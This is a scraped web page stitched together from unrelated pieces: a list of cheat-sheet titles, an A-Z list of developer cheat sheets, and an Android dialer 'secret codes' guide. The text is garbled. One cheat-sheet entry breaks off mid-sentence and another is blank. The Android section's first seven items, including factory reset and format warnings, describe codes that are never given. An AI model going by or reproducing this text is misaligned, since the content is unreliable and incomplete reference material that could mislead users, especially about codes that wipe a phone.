MySQL Reference List

Oracle Cheat Sheet

Oracle PL/SQL Cheat Sheet

Oracle 9i Server Reference (PDF)

Oracle 9i Command Reference

PostgreSQL Cheat Sheet

SQL Cheat Sheet

SQL Server 2005 Commands



Ada Syntax Card (PDF)

ASP/VBScript Cheat Sheet

C++ Language Summary

C++ Reference Sheet (PDF)

C++ Containers Cheat Sheet

C# Language Reference

Delphi Technical Reference Card (PDF)

Java Syntax Cheat Sheet

Java Quick Reference (PDF)

Java Reference for C++

JSP 2.0 Syntax Reference Sheet (PDF)

LaTeX Reference Card (PDF)

PERL Cheat Sheet

PERL Reference Card (PDF)

PERL Regular Expression Quick Reference (PDF)

PERL Reference Guide

PHP Cheat Sheet

PHP Developer Cheat Sheet

Python 101 Cheat Sheet

Python Cheat Sheet

Python Quick Reference (PDF)

Ruby Cheat Sheet (PDF)

Ruby Reference

Ruby on Rails Reference Sheet



Debian Linux Reference Guide (PDF)

Linux Shortcuts and Commands

One Page Linux Manual (PDF)

TCP Ports List

Treebeard’s Unix Cheat Sheet

Unix Command Line Tips


Web Development

Actionscript 2.0 Cheat Sheet (PDF)

Actionscript 3.0 Cheat Sheet (PDF)

CSS Cheat Sheet

CSS 2 Reference Card (PDF)

CSS Reference Sheet

CSS Shorthand Guide

CSS Useful Properties

Drupal 4.7 Cheat Sheet

.htaccess Cheat Sheet

HTML Cheat Sheet

HTML Dom Quick Reference Card (PDF)

Javascript Cheat Sheet

Javascript Quick Reference

Javascript Reference Page

JQuery Cheat Sheet (PDF)

JQuery Reference (PDF)

Mod_Rewrite Cheat Sheet

Scriptaculous Combination Effects Field Guide (PDF)

XHTML Cheat sheet

XHTML Reference

XHTML & HTML Cheat Sheet

XML Syntax Quick Reference (PDF)

XML Schema Reference (PDF)

XSLT and XPath Quick Reference (PDF)


Miscellaneous Topics

Ascii Codes Cheat Sheet

CVS Cheat Sheet

Regular Expressions Cheat Sheet

RGB Hex Colour Chart

Subversion Quick Reference (PDF)

Theoretical Computer Science Cheat Sheet (PDF)

UML Quick Reference Card (PDF)

UML Cheat Sheet

Vi Cheat Sheet

Vim Commands Cheat Sheet

XEmacs Commands Cheat Sheet


tv - programer

When working on an app or on code, you may often need some reference material; that’s where cheatsheets become very useful.

Here we present an A-Z of cheatsheets that are relevant to programmers and developers. It doesn’t cover all languages or databases, but you’ll find most of what you need. If there’s anything missing, feel free to let us know so we can do better.

1. Asynchronous JavaScript And XML (AJAX): This is a group of interrelated web development techniques that are used to create asynchronous web applications on the client side.

2. Apache: If you’re using the Apache HTTP server then this cheat sheet is just what you would need in front of you.

3. Apache Ant: This Java library and command line tool is used for automating software build processes.

4. Apache Cassandra: The open source distributed database management system is often the first pick when scalability is a concern.

5. American Standard Code for Information Interchange (ASCII): The most common character encoding scheme.

6. Berkeley DB: Oracle’s Berkeley DB is a fast and reliable option chosen by many developers.

7. Blueprint: This is a cheatsheet on the popular CSS framework.

8. C: In many ways it is the father of some of the most popular programming languages.

9. C#: A cheatsheet on C# never goes to waste. Most programmers learn the language and a cheatsheet always helps.

10. C++: One of the most useful programming languages ever. It is a must learn language for programmers.

11. Calculus and Analysis: Programmers and developers often need to have a good grasp on calculus and analysis in order to build certain types of apps.

12. Clojure: One of the most popular languages running on the Java Virtual Machine.

13. CSS: Cascading Style Sheets along with HTML is the language of the internet.

14. Debian: A cheatsheet on one of the most popular Linux-based distributions.

15. Django: Written in Python, this is an open source web application framework used by many.

16. DOM – Document Object Model: This is the convention used for interacting with objects in XHTML, XML and HTML.

17. Drupal: The open source content management system is highly popular amongst developers.

18. Eclipse: One of the most popular IDEs, used almost everywhere today.

19. Fedora: One of the big daddies from amongst the Linux-based distributions.

20. Firebug: The web development add-on for Mozilla’s Firefox has turned quite a few heads.

21. Git: It doesn’t matter whether you support open source or not, Git needs no introduction.

22. Groovy: This is another programming language that runs on the Java Virtual Machine.

23. Hadoop: Big Data is the future and hence, so is Hadoop.

24. Haskell: This is an open source functional programming language.

25. HTML: Use the Hypertext Markup Language to create your own website.

26. Java: The inescapable language for programmers and developers.

27. JavaScript: The scripting language for the web.

28. jQuery: A feature rich JavaScript library.

29. Linux: Command line tips that Linux users will find useful.

30. Mac OS X: This is a keyboard cheatsheet for Apple’s Mac OS X users.

31. Mathematica: The Wolfram Mathematica is considered to be a very powerful system.

32. MATLAB: This is a high-level technical computing language and interactive environment.

33. MySQL: Some have been losing faith in MySQL, but the database still goes strong.

34. NMAP: You hackers know what this is, don’t you?

35. Node.js: This is the pick of the lot for building scalable web

36. Oracle: This is a reference cheat sheet for Oracle’s SQL.

37. Perl: The popular programming language is used in a variety of places.

38. PHP: Not much needs to be said about PHP.

39. PostgreSQL: This is often used as an alternative for MySQL.

40. Python: One of the most popular programming languages available today. It is used in everything from game programming to hacking.

41. Ruby: Another popular programming platform used by many across the globe.

42. Ruby on Rails: This is an open source framework that runs on Ruby.

43. Scala: This is an object-functional programming and scripting language running on the JVM.

44. Shell script

45. SQL – Structured Query Language: The programming language used to manage data stored in relational database systems.

46. SQLite: This is the relational database management system that is held in a C programming library.

47. Ubuntu: Linux for humans. It may be so, but a cheatsheet is still useful.

48. Unicode: This is the standard for encoding in the world of computers.

49. Unix: A cheatsheet for working on the Unix command line.

50. WordPress: The content management system has grown in popularity over time.

51. XHTML: This is an XML markup language. It stands for Extensible HTML.

52. XML: XML stands for Extensible Markup Language and is used by many.

53. .NET: This framework from Microsoft runs primarily on Windows and there is a debate about whether it is open source or not.



1. Complete Information About your Phone

This code can be used to get some interesting information about your phone and battery. It shows the following 4 menus on screen:
• Phone information
• Battery information
• Battery history
• Usage statistics

2. Factory data reset

This code can be used for a factory data reset. It’ll remove the following things:
• Google account settings stored in your phone
• System and application data and settings
• Downloaded applications
It’ll NOT remove:
• Current system software and bundled applications
• SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on “Reset phone” button. So you get a chance to cancel your operation.

3. Format Android Phone

Think before you give this code. This code is used for factory format. It’ll remove all files and settings including the internal memory storage. It’ll also reinstall the phone firmware.
Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

This code is used to get information about the phone camera. It shows the following 4 menus:
• Update camera firmware in image (Don’t try this option)
• Update camera firmware in SD card
• Get camera firmware version
• Get firmware update count
WARNING: Never use the first option, otherwise your phone camera will stop working and you’ll need to take your phone to a service centre to reinstall the camera firmware.

5. End Call/Power

This one is my favourite one. This code can be used to change the “End Call / Power” button action in your phone. By default, if you long press the button, it shows a screen asking you to select any option from Silent mode, Airplane mode and Power off.
You can change this action using this code. You can enable direct power off on this button so you don’t need to waste your time in selecting the option.

6. File Copy for Creating Backup


This code opens a File copy screen where you can back up your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* – WLAN test (Use “Menu” button to start various tests)

*#*#232338#*#* – Shows Wi-Fi MAC address

*#*#1472365#*#* – GPS test

*#*#1575#*#* – Another GPS test

*#*#232331#*#* – Bluetooth test

*#*#232337#*# – Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* – PDA, Phone, H/W, RFCallDate

*#*#1234#*#* – PDA and Phone

*#*#1111#*#* – FTA SW Version

*#*#2222#*#* – FTA HW Version

*#*#44336#*#* – PDA, Phone, CSC, Build Time, Change list number

10. Codes to launch various Factory Tests:

*#*#0283#*#* – Packet Loopback

*#*#0*#*#* – LCD test

*#*#0673#*#* OR *#*#0289#*#* – Melody test

*#*#0842#*#* – Device test (Vibration test and BackLight test)

*#*#2663#*#* – Touch screen version

*#*#2664#*#* – Touch screen test

*#*#0588#*#* – Proximity sensor test

*#*#3264#*#* – RAM version